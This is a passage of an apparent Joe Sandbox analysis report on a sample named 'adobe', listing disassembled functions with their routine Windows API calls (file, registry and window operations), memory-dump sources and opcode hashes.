                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                          • Opcode ID: d299bff6ffe95d85c0e1fd2d6a18476be6bf9d726564c92005f9b92eb77878ac
                                                                                                                                                          • Instruction ID: 1943a86784c022a2dfd859aef87f3de3c0de5fcd5c78e915f44ffa8231ae9d07
                                                                                                                                                          • Opcode Fuzzy Hash: d299bff6ffe95d85c0e1fd2d6a18476be6bf9d726564c92005f9b92eb77878ac
                                                                                                                                                          • Instruction Fuzzy Hash: B0E06571304704BFD711EB629C93A5EBBACD745714B914476F500D7541D578AE009558
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0044FE34 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FE74
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                          • Opcode ID: 88ba7f38ac6a174f1adf2cbdf404144dab2fd00d4d43951c8a3f55ea8643f5f2
                                                                                                                                                          • Instruction ID: e92c98a8af308b3432749b2dbea91310ced2c99b4e9e22dcf80a84a4ab028b75
                                                                                                                                                          • Opcode Fuzzy Hash: 88ba7f38ac6a174f1adf2cbdf404144dab2fd00d4d43951c8a3f55ea8643f5f2
                                                                                                                                                          • Instruction Fuzzy Hash: C9E092A13501083ED340EEAC7C42FA33BCC931A718F008037F988C7242C8619D148BA9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042E73C Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528E3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FormatMessage
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1306739567-0
                                                                                                                                                          • Opcode ID: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                                                                                                          • Instruction ID: 307a162b73ad64172b1e6f06154ade3ab8019b251ee6aa90c4987cddc8a641e5
                                                                                                                                                          • Opcode Fuzzy Hash: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                                                                                                          • Instruction Fuzzy Hash: 80E0206178431165F23529156C83F7B120E83C0B08F9480267B50DD3D3DAAE9D09425E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00406300 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                          • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                                                          • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                                                                                                          • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                                                          • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042DD0C Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                          • Opcode ID: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                                                                                                          • Instruction ID: f0f4a7cc191af20e9b9700f54d410718858f5ac06abb37c2f1ccc41e28cff8f4
                                                                                                                                                          • Opcode Fuzzy Hash: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                                                                                                          • Instruction Fuzzy Hash: 05E07EB2610129AF9B40DE8CDC81EEB37ADEB1D350F408016FA08D7200C274EC519BB4
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00454124 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindClose.KERNEL32(00000000,000000FF,0046FAB4,00000000,004708A3,?,00000000,004708EC,?,00000000,00470A25,?,00000000,?,00000000), ref: 0045413A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                          • Opcode ID: 123ba8873f7684904cb00c0292ee7b28b8baed377245af7df09d3c856808d5b2
                                                                                                                                                          • Instruction ID: 4b1f63d47b4ace94505b997b08180f611004efbb3a0cda6d20e285385e33077b
                                                                                                                                                          • Opcode Fuzzy Hash: 123ba8873f7684904cb00c0292ee7b28b8baed377245af7df09d3c856808d5b2
                                                                                                                                                          • Instruction Fuzzy Hash: 31E06570A046004BCB54DF3A898025676D15FD5324F04C56AAC6CCF3D6E63C84859A56
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041468C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(0049404A,?,0049406C,?,?,00000000,0049404A,?,?), ref: 004146AB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                          • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                                                                          • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                                                                                          • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                                                                          • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00406F18 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                          • Opcode ID: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
                                                                                                                                                          • Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
                                                                                                                                                          • Opcode Fuzzy Hash: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
                                                                                                                                                          • Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042365C Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                                                                                                                          • ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                                                                            • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoParametersSystem$ShowWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3202724764-0
                                                                                                                                                          • Opcode ID: dc093307467aee07a8960c528fd934164c1ba3ed2e5551a9532ecfb772f9b12c
                                                                                                                                                          • Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
                                                                                                                                                          • Opcode Fuzzy Hash: dc093307467aee07a8960c528fd934164c1ba3ed2e5551a9532ecfb772f9b12c
                                                                                                                                                          • Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004242D4 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: TextWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 530164218-0
                                                                                                                                                          • Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                                                                                          • Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
                                                                                                                                                          • Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                                                                                          • Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00466354 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,0046703C,00000000,00000000,00000000,0000000C,00000000), ref: 0046636C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                          • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                                                                          • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                                                                                          • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                                                                          • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042CCF0 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00450C3B,00000000), ref: 0042CCFB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                          • Opcode ID: 8b9ee9e5493536d4b48a818bbf765d6651f7f951a086d7a0135ab500ac48ce41
                                                                                                                                                          • Instruction ID: cee2652a42bb6fa335edebfce0b7cce520d77b1cbd3538a4821e8cc024acaa82
                                                                                                                                                          • Opcode Fuzzy Hash: 8b9ee9e5493536d4b48a818bbf765d6651f7f951a086d7a0135ab500ac48ce41
                                                                                                                                                          • Instruction Fuzzy Hash: 66C08CE03222001A9A1065BD3CC911F06C8892833A3A41F37B438E32D2E23E88266028
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00406EC8 Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                          • Opcode ID: 9b296e5fc7b539470b52078a9bfbfb4805330f2922959540d2792222f9fab27f
                                                                                                                                                          • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                                                                                          • Opcode Fuzzy Hash: 9b296e5fc7b539470b52078a9bfbfb4805330f2922959540d2792222f9fab27f
                                                                                                                                                          • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004072B0 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetCurrentDirectoryA.KERNEL32(00000000,?,00496482,00000000,00496655,?,?,00000005,00000000,00496689,?,?,00000000), ref: 004072BB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1611563598-0
                                                                                                                                                          • Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                                                                                          • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                                                                                                          • Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                                                                                          • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0044FF9C Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetEndOfFile.KERNEL32(?,?,0045BB62,00000000,0045BCED,?,00000000,00000002,00000002), ref: 0044FFA3
                                                                                                                                                            • Part of subcall function 0044FD24: GetLastError.KERNEL32(0044FB40,0044FDE6,?,00000000,?,004964F4,00000001,00000000,00000002,00000000,00496655,?,?,00000005,00000000,00496689), ref: 0044FD27
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 734332943-0
                                                                                                                                                          • Opcode ID: f68e6bbbbc14dd3d90c0bac0da1e9de4f6c51ce62b73bda74f22549f965f1593
                                                                                                                                                          • Instruction ID: fa519a0bc74907a80830d7c5fff404009cad8ad3bbe0b7dcc6cc60e8dc594847
                                                                                                                                                          • Opcode Fuzzy Hash: f68e6bbbbc14dd3d90c0bac0da1e9de4f6c51ce62b73bda74f22549f965f1593
                                                                                                                                                          • Instruction Fuzzy Hash: BAC04CA170010047AF10A6AEC5C1A07A3D89E092083154076B904CF207D6A8DC084A54
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042E317 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(?,0042E335), ref: 0042E328
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
